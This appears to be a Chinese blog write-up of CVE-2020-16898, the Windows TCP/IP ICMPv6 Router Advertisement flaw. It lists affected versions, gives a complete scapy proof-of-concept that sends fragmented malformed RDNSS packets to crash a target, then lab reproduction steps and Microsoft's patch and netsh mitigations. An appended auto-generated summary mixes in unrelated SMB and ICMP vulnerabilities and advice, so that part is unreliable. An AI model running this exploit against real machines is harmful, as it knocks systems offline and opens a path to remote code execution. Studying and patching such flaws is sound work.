Microsoft Windows TCPIP 远程代码执行漏洞

1.漏洞编号

CNNVD编号:CNNVD-202010-528

CVE编号:CVE-2020-16898

2.漏洞描述:

       Windows TCP/IP堆栈不正确地处理ICMPv6 Router Advertisement数据包时,存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。要利用此漏洞,攻击者必须将经过特殊设计的ICMPv6 Router Advertisement数据包发送到远程Windows计算机上。

3.影响版本

Microsoft Windows 10 1709版本

Windows 10 1803版本

Windows 10 1809版本

Windows 10 1903版本

Windows 10 1909版本

Windows 10 2004版本

Windows Server 2019版本

Windows Server 1903版本

Windows Server 1909版本

Windows Server 2004版本

4.POC脚本

#!/usr/bin/env python3
#
# Proof-of-Concept / BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
#
# Author: Adam 'pi3' Zabrocki
# http://pi3.com.pl
#

from scapy.all import *
from scapy.layers.inet6 import ICMPv6NDOptEFA, ICMPv6NDOptRDNSS, ICMPv6ND_RA, IPv6, IPv6ExtHdrFragment, fragment6

v6_dst = "fd15:4ba5:5a2b:1008:79f7:5f20:fe8:2995"
v6_src = "fe80::559e:21a8:dc54:bf1b%12"

p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
p_test = p_test_half + 'A'.encode()*4

c = ICMPv6NDOptEFA();

e = ICMPv6NDOptRDNSS()
e.len = 21
e.dns = [
"AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]

pkt = ICMPv6ND_RA() / ICMPv6NDOptRDNSS(len=8) / \
      Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e

p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
              IPv6ExtHdrFragment()/pkt

l=fragment6(p_test_frag, 200)

for p in l:
    send(p)

5.漏洞复现

PS:攻击机器和受害机器能正常进行IPv6通信,需开启IPv6入站规则

1)网络环境开启ipv6支持。这里使用vmware,NAT出一个子网,并开启ipv6支持

2)在vmware中搭建受影响的Win10 1909 32位系统

3)ipconfig命令,受害机器选择IPv6地址

4)攻击机器选择本地链接的IPv6地址

5)执行poc脚本,受害机器成功被打蓝屏

6.修复建议

Microsoft官方公告信息给出详细修复建议,如下:

应用Microsoft官方公告中的补丁:

https://portal.msrc.microsoft.com/zh-cn/security-guidance/advisory/CVE-2020-16898

Microsoft官方提供的临时修复措施:

禁用ICMPv6 RDNSS。

使用以下PowerShell命令禁用ICMPv6 RDNSS,以阻止攻击者利用漏洞。此解决方法仅适用于Windows 1709及更高版本。

netsh int ipv6 set int *INTERFACENUMBER* rabaseddnsconfig=disable

注意:进行更改后,无需重启。

使用下面的PowerShell命令禁用该解决方法。

netsh int ipv6 set int *INTERFACENUMBER* rabaseddnsconfig=enable

注意:禁用后,无需重启。

 

  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
根据引用\[1\],在受影响版本的Windows系统中存在绑定raw socket的应用程序时,TCPIP驱动程序在处理错误的ICMP包时存在内存漏洞,攻击者可以利用这个漏洞向目标计算机发送一个报头中包含一个碎片IP的ICMP数据包,从而导致Windows系统的tcpip.sys驱动崩溃或远程执行恶意代码。这个漏洞被命名为"微软多个Windows系统存在远程代码执行漏洞(ICMP协议)",漏洞类型为代码注入,发现时间为2023年3月15日。该漏洞的影响范围广泛。\[1\] 根据引用\[2\],微软官方已发布了升级补丁来修复这个漏洞。建议用户尽快升级程序,可以通过打开Windows Update并点击检查更新按钮来下载和安装相关的安全补丁。安装完毕后,需要重启服务器并检查系统运行情况。此外,还可以关停SMB服务或使用安全组公网入、内网入方向策略来禁止445、139端口的访问,以增加系统的安全性。\[2\] 根据引用\[3\],受影响的Windows系统版本包括Windows 10 v1903-1909 x64、Windows 10 Version 1903 for 32-bit Systems、Windows 10 Version 1903 for x64-based Systems、Windows 10 Version 1903 for ARM64-based Systems、Windows Server, Version 1903 (Server Core installation)、Windows 10 Version 1909 for 32-bit Systems、Windows 10 Version 1909 for x64-based Systems、Windows 10 Version 1909 for ARM64-based Systems、Windows Server, Version 1909 (Server Core installation)。\[3\] #### 引用[.reference_title] - *1* [微软多个 Windows 系统存在远程代码执行漏洞(ICMP协议)(MPS-2023-1376)](https://blog.csdn.net/murphysec/article/details/129559338)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [【操作系统安全漏洞 】解决CVE-2017-11780:Microsoft Windows SMB Server远程代码执行漏洞](https://blog.csdn.net/weixin_26767391/article/details/119620921)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [【漏洞复现】Windows SMB远程代码执行漏洞(CVE-2020-0796)](https://blog.csdn.net/qq_52549196/article/details/126485940)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值